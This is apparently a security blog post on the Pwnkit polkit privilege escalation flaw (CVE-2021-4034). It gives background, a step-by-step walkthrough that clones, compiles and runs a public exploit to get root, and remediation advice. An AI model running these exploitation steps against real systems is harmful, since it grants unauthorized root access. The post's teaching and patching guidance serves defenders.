Pwnkit Exploit: Local Privilege Escalation in Polkit Package(CVE-2021-4034)

CVE-2021-4034, colloquially known as Pwnkit, is a petrifying Local Privilege Escalation (LPE) vulnerability, detected in the “Polkit” package that is installed by default on almost every major Linux OS Distributions (also many other Unix-like operating systems) like Ubuntu, Debian, Fedora, CentOS and Arch. In a nutshell, this vulnerability affects virtually almost every mainstream Linux system on the planet.

This blog would showcase an overview of this vulnerability along with Proof Of Concept (POC) as well as guidance to patch affected systems. So without further ado, let’s dive in!!

“This vulnerability is one of our most beautiful discoveries; to honour its memory, we recommend listening to DJ Pone’s “Falken’s Maze” (double pun intended) while reading this advisory. Thank you very much!”

~Qualys

Overview

CVE-2021-4034, the 12-year-old security vulnerability that has been discovered in the “Polkit” package, a system utility that grants the attackers with root privileges on Linux (or Unix-like) systems, even a Proof of Concept exploit emerged out of the wild merely hours after technical advisory of the vulnerability was made public.

Dubbed as Pwnkit, this vulnerability was discovered by security researchers at the cybersecurity firm Qualys and was formally announced in January 2022. This vulnerability has existed in every version of the “Polkit” (formerly, PolicyKit) package since it was first released in May 2009 and allows any unprivileged user to gain complete administrative access over almost any Linux machine having the Polkit package installed with ease. Alas, Polkit is installed on almost every major Linux distribution like Ubuntu, Debian, Fedora, CentOS and Arch by default, hence, making this vulnerability extremely
widespread.


What is Polkit?

Prior to looking into the vulnerability, it would help you to understand what Polkit really is.

According to Wikipedia, “Polkit (formerly PolicyKit) is a component for controlling system-wide privileges in Unix-like operating systems. It provides an organized way for non-privileged processes to communicate with privileged ones.

In simpler words, when a user tries to perform an action that requires a higher level of privileges, Polkit can be utilized to determine whether the user has the required permissions. It is integrated with systemd and is much more configurable than a conventional sudo system. Indeed, it is sometimes referred to as the “sudo of systemd“, providing a granular system with which to assign permissions to users.

When interacting with Polkit, we can make use of the pkexec utility – a SUID-root program that is installed by default on every major Linux distribution, which contains the Pwnkit vulnerability. pkexec, analogous to the sudo command, allows an authorized user to execute commands as another user, doubling as a substitute to sudo. If no username is specified, the command would run as the administrative superuser, root.

As an example of using this utility, attempting to run the useradd command through pkexec in a GUI session results in a pop-up asking for credentials:

pkexec useradd test1234

For Ubuntu 21.10
For Garuda Linux

In a nutshell, Polkit can be thought of as a fine-grained alternative to the simpler sudo system that one is familiar with.


The Vulnerability

The CVE-2021-4034 vulnerability has been rated a CVSS (Common Vulnerability Scoring System) base score of 7.8 by RedHat, ergo, declared as “high severity”, which means “one must take immediate action“. Although, NVD Analysts have not yet a CVSS score for this CVE at this time.

As mentioned earlier, the Pwnkit vulnerability exists in the pkexec utility – the primary front-end to the Polkit system. We will not delve too deep into jargon in the interest of readability; however, if one is interested, we encourage you to read through the Qualys Security Advisory for the complete technical explanation of this vulnerability.

The summarization is this: version of pkexec released prior to the patch do not handle the command-line arguments securely, thus, leading to an “out-of-bounds write” vulnerability, allowing an attacker to manipulate the environment with which pkexec is run. This is all one need to really needs to know.

This flaw concerns a case of memory corruption. Despite not being remotely exploitable, an attacker that has already established a foothold on a system via other means can weaponize this vulnerability to their full advantage to gain complete root privileges.

“This vulnerability is an attacker’s dream come true.”

~Qualys

Exploitation

Exploiting Pwnkit is, unfortunately, incredibly easy.

There are many exploits that are available publicly over the internet, and writing your own version is also not a difficult task. The version that we will be used for exploitation is written in C Language by berdav, and the repository for this code can be found here. This variation uses the dangerous GCONV_PATH variable to include a malicious shared object file that calls the /bin/sh shell with root permissions.

Prequisites

Before exploitation, there are some system requirements that are needed to be satisfied for the exploit to run. The target system on which the exploit would be run must have the following utilities installed on them:

  • git
  • gcc
  • make

Type the following commands to install these utilities on Debian/Ubuntu distributions:

$ sudo apt install git
$ sudo apt install gcc
$ sudo apt install make

Type the following commands to install these utilities on Arch Linux distributions:

$ sudo pacman -S git
$ sudo pacman -S gcc
$ sudo pacman -S make

The git and the gcc compiler utilities are installed by default in almost every Linux distribution, but the make the utility has to be installed manually. After these prerequisites have been met, the real exploitation commences.

Exploitation
  • Open the terminal and check the OS version of the target system using the command:
$ lsb_release -a
  • Check the user id.
$ id
  • Clone the exploit code from the GitHub repository.
$ git clone https://github.com/berdav/CVE-2021-4034.git
  • Navigate to the CVE-2021-4034/ directory that contains the exploit.
$ cd CVE-2021-4034/
  • Compile the exploit using the following command:
$ make
  • Run the exploit to gain instant root access over the target!
$ ./cve-2021-4034 
  • Check the user id once again to confirm success.
# id
Proof of Concept

The above exploitation was implemented on a Ubuntu 21.10 and Garuda Linux system and success was achieved along with Proof of Concept.

Verified on Ubuntu 21.10
Verified on Garuda Linux

Remediation

The ease of exploitation and its ubiquitous nature makes this an absolutely devastating vulnerability. So how do we protect against it?

Fortunately, developers tend to be fairly swift when it comes to developing patches for critical vulnerabilities. As a prime example; at the time of writing, Canonical have already released a patched version of the Polkit package in the APT package manager for all versions of Ubuntu that are not end-of-life. The patched version can easily be installed with a simple degradation.

sudo apt update && sudo apt upgrade

In distributions that have not yet released a patched version of the package, the immediately recommended hotfix would be to simply remove the SUID bit from the pkexec binary. This can be done with a command such as the following:

sudo chmod 0755 'which pkexec'

Although far from ideal, it works as a temporary solution until more distributions start packaging versions of Polkit that are patched against Pwnkit.

It should be noted that there are many variations of the Pwnkit exploit using different environment variables and exploiting the vulnerability in different ways. Some of these leave traces and logs behind, others do not.

You can check to ensure that a system is patched by attempting to run a copy of the exploit against it, if it returns pkexec help menu then the system is patched.

For Ubuntu 21.10

Conclusion

During the course of this blog, you have been given a high-level insight into CVE-2021-4034, along with Proof of Concept and some of the available remediations to patch it. You have also been demonstrated the use of one of the exploit versions to attack and compromise a vulnerable target. You should now have a working knowledge of this devastating vulnerability.

And if you like geeking out more about this security vulnerability, then dive in deep with LogPoint’s Detecting PwnKit local privilege escalation vulnerability on how to detect and mitigate this flaw in a pro’s way.

However, Pwnkit was not the first Polkit vulnerability in this time period. You may also wish to check out Scientyfic World covering CVE-2021-3560: a timing attack that led to another local privilege escalation vulnerability.


Note from the author

This blog is brought to you with the wholehearted intent that it improves your awareness, learning and understanding of this vulnerability to better the security landscape. Test systems you own, apply patches and mitigations where appropriate. This is a recent and real-world threat – whether you are a security professional or a script kiddy – this blog is to help you and the world understand and gain awareness of this widespread vulnerability. It should not be used for exploitative gain or self-serving financial incentives.

Additionally, do bear in mind that the developers of the Polkit package work on the open-source as a labour of love and passion. They are volunteers who maintain their projects in their spare time. There should not be any bashing, shame or malice towards those individuals.

As with everything else, please further your knowledge so that you can be a pedestal and pillar for the information security community. While “Hollywood Hacking” is cool and flashy, cybersecurity is a team sport. Please review the external resources and make this community a better place.

Educate, share and help!!

Time is what determines security. With enough time nothing is unhackable.


References

While there are numerous other articles, blogs, resources and learning materials regarding CVE-2021-4034, we have provided these links to external resources as they may have information that would be of interest to you.

If you wish to gain hands-on experience on this vulnerability, visit TryHackMe’s room.

Also Read:

What Is The Log4j Vulnerability And How To Mitigate It? • Scientific World

Sayak Karar
Sayak Karar

Ethical Hacker | Coder | Blogger | Audio Editor | Orator | Web Developer

Articles: 4

6 Comments

Leave a Reply

Your email address will not be published.

You cannot copy content of this page